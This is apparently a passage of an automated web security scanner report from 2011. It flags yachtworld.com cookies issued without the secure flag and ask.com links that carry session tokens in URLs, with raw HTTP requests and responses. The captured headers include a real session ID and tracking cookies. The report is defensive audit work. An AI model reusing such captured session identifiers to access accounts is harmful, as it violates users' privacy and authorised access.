__utmb=20819632.27.10.1296155835; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; yw_c_id=4318294598094503882

Response

5.3. https://www.yachtworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
savedLabel1=24-32%20ft,regulator, Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:10 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: savedSearch0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
Set-Cookie: savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
Set-Cookie: savedSearch1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
Set-Cookie: savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.yachtworld.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Set-Cookie: savedLabel1=24-32%20ft,regulator, Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

5.4. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/consumer_loan_processing.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boat-loans/consumer_loan_processing.html HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

5.5. https://www.yachtworld.com/boat-loans/forgot_password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/forgot_password.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boat-loans/forgot_password.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

5.6. https://www.yachtworld.com/boat-loans/myLoan.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/boat-loans/myLoan.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boat-loans/myLoan.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

6. Session token in URL previous next
There are 2 instances of this issue:

http://www.ask.com/ans
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

6.1. http://www.ask.com/ans previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.ask.com
Path:	/ans

Issue detail

The response contains the following links that appear to contain session tokens:

http://pixel1370.everesttech.net/1370/p?ev_transid=0A4EDD4111C033B329ACD8C41BD460F3&ev_clara_user=1&ev_clara_session_id=014DDB4118C033B329ACD8C41BD460F3&ev_clara_Sports/Sporting_Goods_query_id=D3C44EEC3B3D878C4B9BF746F65F79E2

Request

GET /ans?qsrc=&o=0&l=dir&q=regulator+boat HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
